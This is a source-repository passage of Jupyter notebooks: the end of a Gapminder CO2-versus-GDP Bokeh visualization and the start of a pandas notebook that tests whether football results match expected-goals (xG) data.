" 143 | ], 144 | "text/plain": [ 145 | " Country Year fertility life population child_mortality gdp \\\n", 146 | "0 Afghanistan 1964 7.671 33.639 10474903.0 339.7 1182.0 \n", 147 | "1 Afghanistan 1965 7.671 34.152 10697983.0 334.1 1182.0 \n", 148 | "2 Afghanistan 1966 7.671 34.662 10927724.0 328.7 1168.0 \n", 149 | "3 Afghanistan 1967 7.671 35.170 11163656.0 323.3 1173.0 \n", 150 | "4 Afghanistan 1968 7.671 35.674 11411022.0 318.1 1187.0 \n", 151 | "\n", 152 | " region \n", 153 | "0 South Asia \n", 154 | "1 South Asia \n", 155 | "2 South Asia \n", 156 | "3 South Asia \n", 157 | "4 South Asia " 158 | ] 159 | }, 160 | "execution_count": 4, 161 | "metadata": {}, 162 | "output_type": "execute_result" 163 | } 164 | ], 165 | "source": [ 166 | "gapminder = pd.read_csv('data/gapminder_tidy.csv')\n", 167 | "gapminder.head()" 168 | ] 169 | }, 170 | { 171 | "cell_type": "code", 172 | "execution_count": 21, 173 | "metadata": {}, 174 | "outputs": [ 175 | { 176 | "data": { 177 | "text/html": [ 178 | "
\n", 179 | "\n", 192 | "\n", 193 | " \n", 194 | " \n", 195 | " \n", 196 | " \n", 197 | " \n", 198 | " \n", 199 | " \n", 200 | " \n", 201 | " \n", 202 | " \n", 203 | " \n", 204 | " \n", 205 | " \n", 206 | " \n", 207 | " \n", 208 | " \n", 209 | " \n", 210 | " \n", 211 | " \n", 212 | " \n", 213 | " \n", 214 | " \n", 215 | " \n", 216 | " \n", 217 | " \n", 218 | " \n", 219 | " \n", 220 | " \n", 221 | " \n", 222 | " \n", 223 | " \n", 224 | " \n", 225 | " \n", 226 | " \n", 227 | " \n", 228 | " \n", 229 | " \n", 230 | " \n", 231 | " \n", 232 | " \n", 233 | " \n", 234 | " \n", 235 | " \n", 236 | " \n", 237 | " \n", 238 | " \n", 239 | " \n", 240 | " \n", 241 | " \n", 242 | " \n", 243 | " \n", 244 | " \n", 245 | " \n", 246 | " \n", 247 | " \n", 248 | " \n", 249 | " \n", 250 | " \n", 251 | " \n", 252 | " \n", 253 | " \n", 254 | " \n", 255 | " \n", 256 | " \n", 257 | " \n", 258 | " \n", 259 | " \n", 260 | " \n", 261 | " \n", 262 | " \n", 263 | " \n", 264 | " \n", 265 | " \n", 266 | " \n", 267 | " \n", 268 | " \n", 269 | " \n", 270 | " \n", 271 | " \n", 272 | " \n", 273 | " \n", 274 | " \n", 275 | " \n", 276 | " \n", 277 | " \n", 278 | " \n", 279 | " \n", 280 | " \n", 281 | " \n", 282 | " \n", 283 | " \n", 284 | " \n", 285 | " \n", 286 | " \n", 287 | " \n", 288 | " \n", 289 | " \n", 290 | " \n", 291 | " \n", 292 | " \n", 293 | " \n", 294 | " \n", 295 | " \n", 296 | " \n", 297 | " \n", 298 | " \n", 299 | " \n", 300 | " \n", 301 | " \n", 302 | " \n", 303 | " \n", 304 | " \n", 305 | " \n", 306 | " \n", 307 | " \n", 308 | " \n", 309 | " \n", 310 | " \n", 311 | " \n", 312 | " \n", 313 | " \n", 314 | " \n", 315 | " \n", 316 | " \n", 317 | " \n", 318 | " \n", 319 | " \n", 320 | " \n", 321 | " \n", 322 | " \n", 323 | " \n", 324 | " \n", 325 | " \n", 326 | " \n", 327 | " \n", 328 | " \n", 329 | " \n", 330 | " \n", 331 | " \n", 332 | " \n", 333 | " \n", 334 | " \n", 335 | " \n", 336 | " \n", 337 | " \n", 338 | " \n", 339 | " \n", 340 | " \n", 341 | "
country180018011802180318041805180618071808...200620072008200920102011201220132014region
0AfghanistanNaNNaNNaNNaNNaNNaNNaNNaNNaN...0.06370.08540.1540.2420.2940.4120.350.3160.299South Asia
1AlbaniaNaNNaNNaNNaNNaNNaNNaNNaNNaN...1.28001.30001.4601.4801.5601.7901.681.7301.960Europe & Central Asia
2AlgeriaNaNNaNNaNNaNNaNNaNNaNNaNNaN...2.99003.19003.1603.4203.3003.2903.463.5103.720Middle East & North Africa
3AngolaNaNNaNNaNNaNNaNNaNNaNNaNNaN...1.10001.20001.1801.2301.2401.2501.331.2501.290Sub-Saharan Africa
4Antigua and BarbudaNaNNaNNaNNaNNaNNaNNaNNaNNaN...4.91005.14005.1905.4505.5405.3605.425.3605.380America
\n", 342 | "

5 rows × 217 columns

\n", 343 | "
" 344 | ], 345 | "text/plain": [ 346 | " country 1800 1801 1802 1803 1804 1805 1806 1807 1808 \\\n", 347 | "0 Afghanistan NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 348 | "1 Albania NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 349 | "2 Algeria NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 350 | "3 Angola NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 351 | "4 Antigua and Barbuda NaN NaN NaN NaN NaN NaN NaN NaN NaN \n", 352 | "\n", 353 | " ... 2006 2007 2008 2009 2010 2011 \\\n", 354 | "0 ... 0.0637 0.0854 0.154 0.242 0.294 0.412 \n", 355 | "1 ... 1.2800 1.3000 1.460 1.480 1.560 1.790 \n", 356 | "2 ... 2.9900 3.1900 3.160 3.420 3.300 3.290 \n", 357 | "3 ... 1.1000 1.2000 1.180 1.230 1.240 1.250 \n", 358 | "4 ... 4.9100 5.1400 5.190 5.450 5.540 5.360 \n", 359 | "\n", 360 | " 2012 2013 2014 region \n", 361 | "0 0.35 0.316 0.299 South Asia \n", 362 | "1 1.68 1.730 1.960 Europe & Central Asia \n", 363 | "2 3.46 3.510 3.720 Middle East & North Africa \n", 364 | "3 1.33 1.250 1.290 Sub-Saharan Africa \n", 365 | "4 5.42 5.360 5.380 America \n", 366 | "\n", 367 | "[5 rows x 217 columns]" 368 | ] 369 | }, 370 | "execution_count": 21, 371 | "metadata": {}, 372 | "output_type": "execute_result" 373 | } 374 | ], 375 | "source": [ 376 | "df = gapminder[['Country', 'region']].drop_duplicates()\n", 377 | "data_with_regions = pd.merge(data, df, left_on='country', right_on='Country', how='inner')\n", 378 | "data_with_regions = data_with_regions.drop('Country', axis='columns')\n", 379 | "\n", 380 | "data_with_regions.head()" 381 | ] 382 | }, 383 | { 384 | "cell_type": "code", 385 | "execution_count": 22, 386 | "metadata": {}, 387 | "outputs": [ 388 | { 389 | "data": { 390 | "text/html": [ 391 | "
\n", 392 | "\n", 405 | "\n", 406 | " \n", 407 | " \n", 408 | " \n", 409 | " \n", 410 | " \n", 411 | " \n", 412 | " \n", 413 | " \n", 414 | " \n", 415 | " \n", 416 | " \n", 417 | " \n", 418 | " \n", 419 | " \n", 420 | " \n", 421 | " \n", 422 | " \n", 423 | " \n", 424 | " \n", 425 | " \n", 426 | " \n", 427 | " \n", 428 | " \n", 429 | " \n", 430 | " \n", 431 | " \n", 432 | " \n", 433 | " \n", 434 | " \n", 435 | " \n", 436 | " \n", 437 | " \n", 438 | " \n", 439 | " \n", 440 | " \n", 441 | " \n", 442 | " \n", 443 | " \n", 444 | " \n", 445 | " \n", 446 | " \n", 447 | " \n", 448 | " \n", 449 | " \n", 450 | " \n", 451 | " \n", 452 | "
countryregionyearco2
0AfghanistanSouth Asia1800NaN
1AlbaniaEurope & Central Asia1800NaN
2AlgeriaMiddle East & North Africa1800NaN
3AngolaSub-Saharan Africa1800NaN
4Antigua and BarbudaAmerica1800NaN
\n", 453 | "
" 454 | ], 455 | "text/plain": [ 456 | " country region year co2\n", 457 | "0 Afghanistan South Asia 1800 NaN\n", 458 | "1 Albania Europe & Central Asia 1800 NaN\n", 459 | "2 Algeria Middle East & North Africa 1800 NaN\n", 460 | "3 Angola Sub-Saharan Africa 1800 NaN\n", 461 | "4 Antigua and Barbuda America 1800 NaN" 462 | ] 463 | }, 464 | "execution_count": 22, 465 | "metadata": {}, 466 | "output_type": "execute_result" 467 | } 468 | ], 469 | "source": [ 470 | "new_df = pd.melt(data_with_regions, id_vars=['country', 'region'])\n", 471 | "columns = ['country', 'region', 'year', 'co2']\n", 472 | "new_df.columns = columns\n", 473 | "new_df['year'] = new_df['year'].astype('int64')\n", 474 | "new_df.head()" 475 | ] 476 | }, 477 | { 478 | "cell_type": "code", 479 | "execution_count": 24, 480 | "metadata": {}, 481 | "outputs": [ 482 | { 483 | "data": { 484 | "text/html": [ 485 | "
\n", 486 | "\n", 499 | "\n", 500 | " \n", 501 | " \n", 502 | " \n", 503 | " \n", 504 | " \n", 505 | " \n", 506 | " \n", 507 | " \n", 508 | " \n", 509 | " \n", 510 | " \n", 511 | " \n", 512 | " \n", 513 | " \n", 514 | " \n", 515 | " \n", 516 | " \n", 517 | " \n", 518 | " \n", 519 | " \n", 520 | " \n", 521 | " \n", 522 | " \n", 523 | " \n", 524 | " \n", 525 | " \n", 526 | " \n", 527 | " \n", 528 | " \n", 529 | " \n", 530 | " \n", 531 | " \n", 532 | " \n", 533 | " \n", 534 | " \n", 535 | " \n", 536 | " \n", 537 | " \n", 538 | " \n", 539 | " \n", 540 | " \n", 541 | " \n", 542 | " \n", 543 | " \n", 544 | " \n", 545 | " \n", 546 | "
countryregionyearco2
28372AfghanistanSouth Asia19640.0863
28545AfghanistanSouth Asia19650.1010
28718AfghanistanSouth Asia19660.1080
28891AfghanistanSouth Asia19670.1240
29064AfghanistanSouth Asia19680.1160
\n", 547 | "
" 548 | ], 549 | "text/plain": [ 550 | " country region year co2\n", 551 | "28372 Afghanistan South Asia 1964 0.0863\n", 552 | "28545 Afghanistan South Asia 1965 0.1010\n", 553 | "28718 Afghanistan South Asia 1966 0.1080\n", 554 | "28891 Afghanistan South Asia 1967 0.1240\n", 555 | "29064 Afghanistan South Asia 1968 0.1160" 556 | ] 557 | }, 558 | "execution_count": 24, 559 | "metadata": {}, 560 | "output_type": "execute_result" 561 | } 562 | ], 563 | "source": [ 564 | "upd_new_df = new_df[new_df['year'].astype('int64') > 1963]\n", 565 | "upd_new_df = upd_new_df.sort_values(by=['country', 'year'])\n", 566 | "upd_new_df.head()" 567 | ] 568 | }, 569 | { 570 | "cell_type": "code", 571 | "execution_count": 25, 572 | "metadata": {}, 573 | "outputs": [ 574 | { 575 | "name": "stdout", 576 | "output_type": "stream", 577 | "text": [ 578 | "\n", 579 | "RangeIndex: 10111 entries, 0 to 10110\n", 580 | "Data columns (total 3 columns):\n", 581 | "country 10111 non-null object\n", 582 | "year 10111 non-null int64\n", 583 | "gdp 9000 non-null float64\n", 584 | "dtypes: float64(1), int64(1), object(1)\n", 585 | "memory usage: 237.1+ KB\n" 586 | ] 587 | } 588 | ], 589 | "source": [ 590 | "df_gdp = gapminder[['Country', 'Year', 'gdp']]\n", 591 | "df_gdp.columns = ['country', 'year', 'gdp']\n", 592 | "df_gdp.info()" 593 | ] 594 | }, 595 | { 596 | "cell_type": "code", 597 | "execution_count": 26, 598 | "metadata": {}, 599 | "outputs": [ 600 | { 601 | "data": { 602 | "text/html": [ 603 | "
\n", 604 | "\n", 617 | "\n", 618 | " \n", 619 | " \n", 620 | " \n", 621 | " \n", 622 | " \n", 623 | " \n", 624 | " \n", 625 | " \n", 626 | " \n", 627 | " \n", 628 | " \n", 629 | " \n", 630 | " \n", 631 | " \n", 632 | " \n", 633 | " \n", 634 | " \n", 635 | " \n", 636 | " \n", 637 | " \n", 638 | " \n", 639 | " \n", 640 | " \n", 641 | " \n", 642 | " \n", 643 | " \n", 644 | " \n", 645 | " \n", 646 | " \n", 647 | " \n", 648 | " \n", 649 | " \n", 650 | " \n", 651 | " \n", 652 | " \n", 653 | " \n", 654 | " \n", 655 | " \n", 656 | " \n", 657 | " \n", 658 | " \n", 659 | " \n", 660 | " \n", 661 | " \n", 662 | " \n", 663 | " \n", 664 | " \n", 665 | " \n", 666 | " \n", 667 | " \n", 668 | " \n", 669 | " \n", 670 | "
countryregionyearco2gdp
0AfghanistanSouth Asia19640.08631182.0
1AfghanistanSouth Asia19650.10101182.0
2AfghanistanSouth Asia19660.10801168.0
3AfghanistanSouth Asia19670.12401173.0
4AfghanistanSouth Asia19680.11601187.0
\n", 671 | "
" 672 | ], 673 | "text/plain": [ 674 | " country region year co2 gdp\n", 675 | "0 Afghanistan South Asia 1964 0.0863 1182.0\n", 676 | "1 Afghanistan South Asia 1965 0.1010 1182.0\n", 677 | "2 Afghanistan South Asia 1966 0.1080 1168.0\n", 678 | "3 Afghanistan South Asia 1967 0.1240 1173.0\n", 679 | "4 Afghanistan South Asia 1968 0.1160 1187.0" 680 | ] 681 | }, 682 | "execution_count": 26, 683 | "metadata": {}, 684 | "output_type": "execute_result" 685 | } 686 | ], 687 | "source": [ 688 | "final_df = pd.merge(upd_new_df, df_gdp, on=['country', 'year'], how='left')\n", 689 | "final_df = final_df.dropna()\n", 690 | "final_df.head()" 691 | ] 692 | }, 693 | { 694 | "cell_type": "code", 695 | "execution_count": 27, 696 | "metadata": {}, 697 | "outputs": [], 698 | "source": [ 699 | "# Creating visualization app with Bokeh.io\n", 700 | "regions_list = final_df.region.unique().tolist()\n", 701 | "color_mapper = CategoricalColorMapper(factors=regions_list, palette=Spectral6)" 702 | ] 703 | }, 704 | { 705 | "cell_type": "code", 706 | "execution_count": 28, 707 | "metadata": {}, 708 | "outputs": [], 709 | "source": [ 710 | "# Make the ColumnDataSource: source\n", 711 | "source = ColumnDataSource(data={\n", 712 | " 'x': final_df.gdp[final_df['year'] == 1964],\n", 713 | " 'y': final_df.co2[final_df['year'] == 1964],\n", 714 | " 'country': final_df.country[final_df['year'] == 1964],\n", 715 | " 'region': final_df.region[final_df['year'] == 1964],\n", 716 | "})" 717 | ] 718 | }, 719 | { 720 | "cell_type": "code", 721 | "execution_count": 29, 722 | "metadata": {}, 723 | "outputs": [], 724 | "source": [ 725 | "# Save the minimum and maximum values of the fertility column: xmin, xmax\n", 726 | "xmin, xmax = min(final_df.gdp), max(final_df.gdp)\n", 727 | "\n", 728 | "# Save the minimum and maximum values of the life expectancy column: ymin, ymax\n", 729 | "ymin, ymax = min(final_df.co2), max(final_df.co2)" 730 | ] 731 | }, 732 | { 733 | "cell_type": "code", 734 | "execution_count": 30, 735 | "metadata": {}, 736 | "outputs": [], 737 | "source": [ 738 | "# Create the figure: plot\n", 739 | "plot = figure(title='Gapminder Data for 1964', plot_height=400, plot_width=700,\n", 740 | " x_range=(xmin, xmax), y_range=(ymin, ymax))\n", 741 | "\n", 742 | "# Add circle glyphs to the plot\n", 743 | "plot.circle(x='x', y='y', fill_alpha=0.8, source=source, legend='region',\n", 744 | " color=dict(field='region', transform=color_mapper))\n", 745 | "\n", 746 | "# Set the legend.location attribute of the plot to 'top_right'\n", 747 | "plot.legend.location = 'top_right'\n", 748 | "\n", 749 | "# Set the x-axis label\n", 750 | "plot.xaxis.axis_label = 'GDP'\n", 751 | "\n", 752 | "# Set the y-axis label\n", 753 | "plot.yaxis.axis_label = 'CO2 emissions (tonnes per person)'" 754 | ] 755 | }, 756 | { 757 | "cell_type": "code", 758 | "execution_count": 31, 759 | "metadata": {}, 760 | "outputs": [], 761 | "source": [ 762 | "def update_plot(attr, old, new):\n", 763 | " # set the `yr` name to `slider.value` and `source.data = new_data`\n", 764 | " yr = slider.value\n", 765 | "\n", 766 | " new_data = {\n", 767 | " 'x': final_df.gdp[final_df['year'] == yr],\n", 768 | " 'y': final_df.co2[final_df['year'] == yr],\n", 769 | " 'country': final_df.country[final_df['year'] == yr],\n", 770 | " 'region': final_df.region[final_df['year'] == yr],\n", 771 | " }\n", 772 | " source.data = new_data\n", 773 | "\n", 774 | " # Add title to figure: plot.title.text\n", 775 | " plot.title.text = 'Gapminder data for %d' % yr" 776 | ] 777 | }, 778 | { 779 | "cell_type": "code", 780 | "execution_count": 32, 781 | "metadata": {}, 782 | "outputs": [], 783 | "source": [ 784 | "# Make a slider object: slider\n", 785 | "slider = Slider(start=1964, end=2013, step=1, value=1964, title='Year')\n", 786 | "\n", 787 | "# Attach the callback to the 'value' property of slider\n", 788 | "slider.on_change('value', update_plot)" 789 | ] 790 | }, 791 | { 792 | "cell_type": "code", 793 | "execution_count": 33, 794 | "metadata": {}, 795 | "outputs": [], 796 | "source": [ 797 | "# Create a HoverTool: hover\n", 798 | "hover = HoverTool(tooltips=[('Country', '@country')])\n", 799 | "\n", 800 | "# Add the HoverTool to the plot\n", 801 | "plot.add_tools(hover)" 802 | ] 803 | }, 804 | { 805 | "cell_type": "code", 806 | "execution_count": 34, 807 | "metadata": {}, 808 | "outputs": [], 809 | "source": [ 810 | "# Make a row layout of widgetbox(slider) and plot and add it to the current document\n", 811 | "layout = row(widgetbox(slider), plot)\n", 812 | "curdoc().add_root(layout)" 813 | ] 814 | } 815 | ], 816 | "metadata": { 817 | "kernelspec": { 818 | "display_name": "Python 3", 819 | "language": "python", 820 | "name": "python3" 821 | }, 822 | "language_info": { 823 | "codemirror_mode": { 824 | "name": "ipython", 825 | "version": 3 826 | }, 827 | "file_extension": ".py", 828 | "mimetype": "text/x-python", 829 | "name": "python", 830 | "nbconvert_exporter": "python", 831 | "pygments_lexer": "ipython3", 832 | "version": "3.6.3" 833 | } 834 | }, 835 | "nbformat": 4, 836 | "nbformat_minor": 2 837 | } 838 | -------------------------------------------------------------------------------- /is_football_fair.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Is Football Fair?\n", 8 | "\n", 9 | "Good question, isn't it? Seeing how Real Madrid wins their Champions League trophies (yes, I am a Barcelona fan) one might think it is not fair at all. Also, knowing that the game is low-scoring and luck plays quite a role in it, one might get to the same conclusion - the game isn't fair at all.\n", 10 | "\n", 11 | "But what do we mean by calling a game fair? In the end, if the team won, they fought for it, they deserved the victory and this victory is fair for them. From the other side, we have seen a lot of lucky goals or unfortunate errors that led to goals that made a decisive turn in the game. If favourite always wins - is it fair? Probably. But it is not that fun. From the other side, when outsider wins, is this fair?\n", 12 | "\n", 13 | "I guess the right answer will always be \"it depends\". It depends on an effort that a team put into their victory. If the team plays well and wins it is fair, correct? If the team can't even make a shot on the opponent's goal and loses, it is also fair, correct?\n", 14 | "\n", 15 | "Another story is when a team plays incredibly well, creates moments, attacks. but cannot score, while the opponent makes one shot, scores one goal and wins. This is totally unfair. These days we have the possibility to evaluate an effort that team made in every particular game and see if th result of that effort was fair.\n", 16 | "\n", 17 | "xG metric shows us an expected goal value for every shot in the game and usually it is a great indicator of an amount of moments the team created to score a goal. \n", 18 | "\n", 19 | "I have found a dataset with xG metrics for every game in the last few years in 40 different football leagues. More about where and how I got that data [here](https://medium.com/geekculture/scraping-xg-data-for-almost-any-league-in-the-world-9e9ddcc2a339?sk=3e422d47b778038eaab6bab7150dad7b).\n", 20 | "\n", 21 | "\n", 22 | "## Plan of action\n", 23 | "So, if the team created enough moments to score 2 goals and scored 2 - it is fair. If their opponent created moments for 1 goal and scored 1, the final result should've been 2-1 and the first team should have won. That's what we will call fair. We have to calculate the amount of games that ended up 'fairly' - if the xG of one team is bigger than the xG of another, the result has to be the victory of the first team. The same goes for draws - both teams created moments for 1 goals each, then draw is a fair result.\n", 24 | "\n", 25 | "*Note:* Obviously, the time of goal scoring is important in football, who scores first too, and many-many other factors. I am not pretending to be the judge of fairness, just a simple general look into data for a lot of games to see some basic trends.\n", 26 | "\n", 27 | "In the perfect and fair world if we were to compare xG results with actual results the compatibility should have been 100%, which means that all the games that ended up with one result or another based on xG, ended up the same in reality. Also, in such a world unicorns could have been possible.\n", 28 | "\n", 29 | "Let's assume that if 90% of the games won/drawn/lost by xG in reality ended up with the same result, we can call football fair. This number, 90%, is taken out of nothing and is subject to discussions. Also, probably, it might make sense to calculate this 'coefficient of fairness' in basketball and then apply it to football. As basket is a high-scoring game, the influence of luck is quite reduced here, meaning that normally a stronger team will win. Finding out the percentage of games that end up with xg_result=actual_result will create a benchmark for this 'coefficient of fairness'. Maybe that's a topic for the next article. At the moment let's use the 90% benchmark.\n" 30 | ] 31 | }, 32 | { 33 | "cell_type": "markdown", 34 | "metadata": {}, 35 | "source": [ 36 | "## Process" 37 | ] 38 | }, 39 | { 40 | "cell_type": "markdown", 41 | "metadata": {}, 42 | "source": [ 43 | "Let's import standard data manipulation libraries and get our data." 44 | ] 45 | }, 46 | { 47 | "cell_type": "code", 48 | "execution_count": 14, 49 | "metadata": {}, 50 | "outputs": [], 51 | "source": [ 52 | "import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n", 53 | "import numpy as np\n", 54 | "import matplotlib.pyplot as plt" 55 | ] 56 | }, 57 | { 58 | "cell_type": "code", 59 | "execution_count": 15, 60 | "metadata": {}, 61 | "outputs": [], 62 | "source": [ 63 | "URL = 'https://projects.fivethirtyeight.com/soccer-api/club/spi_matches.csv'\n", 64 | "\n", 65 | "data = pd.read_csv(URL)" 66 | ] 67 | }, 68 | { 69 | "cell_type": "markdown", 70 | "metadata": {}, 71 | "source": [ 72 | "Checking the columns in our dataset." 73 | ] 74 | }, 75 | { 76 | "cell_type": "code", 77 | "execution_count": 16, 78 | "metadata": {}, 79 | "outputs": [ 80 | { 81 | "data": { 82 | "text/plain": [ 83 | "Index(['season', 'date', 'league_id', 'league', 'team1', 'team2', 'spi1',\n", 84 | " 'spi2', 'prob1', 'prob2', 'probtie', 'proj_score1', 'proj_score2',\n", 85 | " 'importance1', 'importance2', 'score1', 'score2', 'xg1', 'xg2', 'nsxg1',\n", 86 | " 'nsxg2', 'adj_score1', 'adj_score2'],\n", 87 | " dtype='object')" 88 | ] 89 | }, 90 | "execution_count": 16, 91 | "metadata": {}, 92 | "output_type": "execute_result" 93 | } 94 | ], 95 | "source": [ 96 | "data.columns" 97 | ] 98 | }, 99 | { 100 | "cell_type": "markdown", 101 | "metadata": {}, 102 | "source": [ 103 | "We won't need the majority of this columns, so we select only those we are interested in: 'season', 'date', 'league', 'team1', 'team2', 'score1', 'score2', 'xg1', 'xg2'. At the same time we drop all the rows with null values in this modified dataset as we cannot use them at all." 104 | ] 105 | }, 106 | { 107 | "cell_type": "code", 108 | "execution_count": 17, 109 | "metadata": {}, 110 | "outputs": [], 111 | "source": [ 112 | "# championship = data[data['league'] == 'English League Championship']\n", 113 | "data = data[['season', 'date', 'league', 'team1', 'team2', 'score1', 'score2', 'xg1', 'xg2']]\n", 114 | "data = data.dropna()" 115 | ] 116 | }, 117 | { 118 | "cell_type": "markdown", 119 | "metadata": {}, 120 | "source": [ 121 | "`describe()` method is an excellent way to quickly get an idea of what kind of data we have here. As we can see, the analysis will be based on 29659 games from different countries and different levels of leagues, with the data from 2016 to 2022. We can also see that record amount of goals is 13 during this period of time, while the maximum xG is 8.27 (and it has yet to be confirmed if that happened in the same game)." 122 | ] 123 | }, 124 | { 125 | "cell_type": "code", 126 | "execution_count": 18, 127 | "metadata": {}, 128 | "outputs": [ 129 | { 130 | "data": { 131 | "text/html": [ 132 | "
\n", 133 | "\n", 146 | "\n", 147 | " \n", 148 | " \n", 149 | " \n", 150 | " \n", 151 | " \n", 152 | " \n", 153 | " \n", 154 | " \n", 155 | " \n", 156 | " \n", 157 | " \n", 158 | " \n", 159 | " \n", 160 | " \n", 161 | " \n", 162 | " \n", 163 | " \n", 164 | " \n", 165 | " \n", 166 | " \n", 167 | " \n", 168 | " \n", 169 | " \n", 170 | " \n", 171 | " \n", 172 | " \n", 173 | " \n", 174 | " \n", 175 | " \n", 176 | " \n", 177 | " \n", 178 | " \n", 179 | " \n", 180 | " \n", 181 | " \n", 182 | " \n", 183 | " \n", 184 | " \n", 185 | " \n", 186 | " \n", 187 | " \n", 188 | " \n", 189 | " \n", 190 | " \n", 191 | " \n", 192 | " \n", 193 | " \n", 194 | " \n", 195 | " \n", 196 | " \n", 197 | " \n", 198 | " \n", 199 | " \n", 200 | " \n", 201 | " \n", 202 | " \n", 203 | " \n", 204 | " \n", 205 | " \n", 206 | " \n", 207 | " \n", 208 | " \n", 209 | " \n", 210 | " \n", 211 | " \n", 212 | " \n", 213 | " \n", 214 | " \n", 215 | " \n", 216 | " \n", 217 | " \n", 218 | " \n", 219 | " \n", 220 | " \n", 221 | " \n", 222 | " \n", 223 | "
seasonscore1score2xg1xg2
count29659.0029659.0029659.0029659.0029659.00
mean2018.941.521.191.491.19
std1.641.271.140.830.74
min2016.000.000.000.000.00
25%2018.001.000.000.880.63
50%2019.001.001.001.361.05
75%2020.002.002.001.961.59
max2022.0010.0013.007.078.27
\n", 224 | "
" 225 | ], 226 | "text/plain": [ 227 | " season score1 score2 xg1 xg2\n", 228 | "count 29659.00 29659.00 29659.00 29659.00 29659.00\n", 229 | "mean 2018.94 1.52 1.19 1.49 1.19\n", 230 | "std 1.64 1.27 1.14 0.83 0.74\n", 231 | "min 2016.00 0.00 0.00 0.00 0.00\n", 232 | "25% 2018.00 1.00 0.00 0.88 0.63\n", 233 | "50% 2019.00 1.00 1.00 1.36 1.05\n", 234 | "75% 2020.00 2.00 2.00 1.96 1.59\n", 235 | "max 2022.00 10.00 13.00 7.07 8.27" 236 | ] 237 | }, 238 | "execution_count": 18, 239 | "metadata": {}, 240 | "output_type": "execute_result" 241 | } 242 | ], 243 | "source": [ 244 | "data.describe().round(2)" 245 | ] 246 | }, 247 | { 248 | "cell_type": "markdown", 249 | "metadata": {}, 250 | "source": [ 251 | "Well, OK. That happened in the same game." 252 | ] 253 | }, 254 | { 255 | "cell_type": "code", 256 | "execution_count": 19, 257 | "metadata": {}, 258 | "outputs": [ 259 | { 260 | "data": { 261 | "text/html": [ 262 | "
\n", 263 | "\n", 276 | "\n", 277 | " \n", 278 | " \n", 279 | " \n", 280 | " \n", 281 | " \n", 282 | " \n", 283 | " \n", 284 | " \n", 285 | " \n", 286 | " \n", 287 | " \n", 288 | " \n", 289 | " \n", 290 | " \n", 291 | " \n", 292 | " \n", 293 | " \n", 294 | " \n", 295 | " \n", 296 | " \n", 297 | " \n", 298 | " \n", 299 | " \n", 300 | " \n", 301 | " \n", 302 | " \n", 303 | " \n", 304 | " \n", 305 | "
seasondateleagueteam1team2score1score2xg1xg2
3566220202020-10-24Dutch EredivisieVVV VenloAjax0.013.00.238.27
\n", 306 | "
" 307 | ], 308 | "text/plain": [ 309 | " season date league team1 team2 score1 score2 \\\n", 310 | "35662 2020 2020-10-24 Dutch Eredivisie VVV Venlo Ajax 0.0 13.0 \n", 311 | "\n", 312 | " xg1 xg2 \n", 313 | "35662 0.23 8.27 " 314 | ] 315 | }, 316 | "execution_count": 19, 317 | "metadata": {}, 318 | "output_type": "execute_result" 319 | } 320 | ], 321 | "source": [ 322 | "data[data['xg2'] > 8]" 323 | ] 324 | }, 325 | { 326 | "cell_type": "markdown", 327 | "metadata": {}, 328 | "source": [ 329 | "As dataset do not give us a column `'result'` we will calculate it on our own. The same will be done for the column `'xg_result'` only with a little tweak - rounding to the integer, because without it the draws are impossible. Yes, rounding may distort a result somehow, but as was stated before, this article is not pretending to be published in science journal, just amateur playing around with numbers. \n", 330 | "\n", 331 | "To create these columns `np.select` is a perfect tool for the job. It's kinda case-when statement." 332 | ] 333 | }, 334 | { 335 | "cell_type": "code", 336 | "execution_count": 20, 337 | "metadata": {}, 338 | "outputs": [], 339 | "source": [ 340 | "conditions = [\n", 341 | " (data['score1'] > data['score2']),\n", 342 | " (data['score1'] == data['score2']),\n", 343 | " (data['score1'] < data['score2'])\n", 344 | "]\n", 345 | "values = ['1', 'X', '2'] # home_win, draw, away_win\n", 346 | "data['result'] = np.select(conditions, values)" 347 | ] 348 | }, 349 | { 350 | "cell_type": "code", 351 | "execution_count": 21, 352 | "metadata": {}, 353 | "outputs": [], 354 | "source": [ 355 | "xg_conditions = [\n", 356 | " (data['xg1'].round(0) > data['xg2'].round(0)),\n", 357 | " (data['xg1'].round(0) == data['xg2'].round(0)),\n", 358 | " (data['xg1'].round(0) < data['xg2'].round(0))\n", 359 | "]\n", 360 | "xg_values = ['1', 'X', '2'] # home_win, draw, away_win\n", 361 | "data['xg_result'] = np.select(xg_conditions, xg_values)" 362 | ] 363 | }, 364 | { 365 | "cell_type": "markdown", 366 | "metadata": {}, 367 | "source": [ 368 | "We take a look at our data and we already see that results do not match in 4 cases out of 5. But this selection isn't representative, we have to check out at all the games." 369 | ] 370 | }, 371 | { 372 | "cell_type": "code", 373 | "execution_count": 22, 374 | "metadata": {}, 375 | "outputs": [ 376 | { 377 | "data": { 378 | "text/html": [ 379 | "
\n", 380 | "\n", 393 | "\n", 394 | " \n", 395 | " \n", 396 | " \n", 397 | " \n", 398 | " \n", 399 | " \n", 400 | " \n", 401 | " \n", 402 | " \n", 403 | " \n", 404 | " \n", 405 | " \n", 406 | " \n", 407 | " \n", 408 | " \n", 409 | " \n", 410 | " \n", 411 | " \n", 412 | " \n", 413 | " \n", 414 | " \n", 415 | " \n", 416 | " \n", 417 | " \n", 418 | " \n", 419 | " \n", 420 | " \n", 421 | " \n", 422 | " \n", 423 | " \n", 424 | " \n", 425 | " \n", 426 | " \n", 427 | " \n", 428 | " \n", 429 | " \n", 430 | " \n", 431 | " \n", 432 | " \n", 433 | " \n", 434 | " \n", 435 | " \n", 436 | " \n", 437 | " \n", 438 | " \n", 439 | " \n", 440 | " \n", 441 | " \n", 442 | " \n", 443 | " \n", 444 | " \n", 445 | " \n", 446 | " \n", 447 | " \n", 448 | " \n", 449 | " \n", 450 | " \n", 451 | " \n", 452 | " \n", 453 | " \n", 454 | " \n", 455 | " \n", 456 | " \n", 457 | " \n", 458 | " \n", 459 | " \n", 460 | " \n", 461 | " \n", 462 | " \n", 463 | " \n", 464 | " \n", 465 | " \n", 466 | " \n", 467 | " \n", 468 | " \n", 469 | " \n", 470 | " \n", 471 | " \n", 472 | " \n", 473 | " \n", 474 | " \n", 475 | " \n", 476 | " \n", 477 | " \n", 478 | " \n", 479 | " \n", 480 | " \n", 481 | " \n", 482 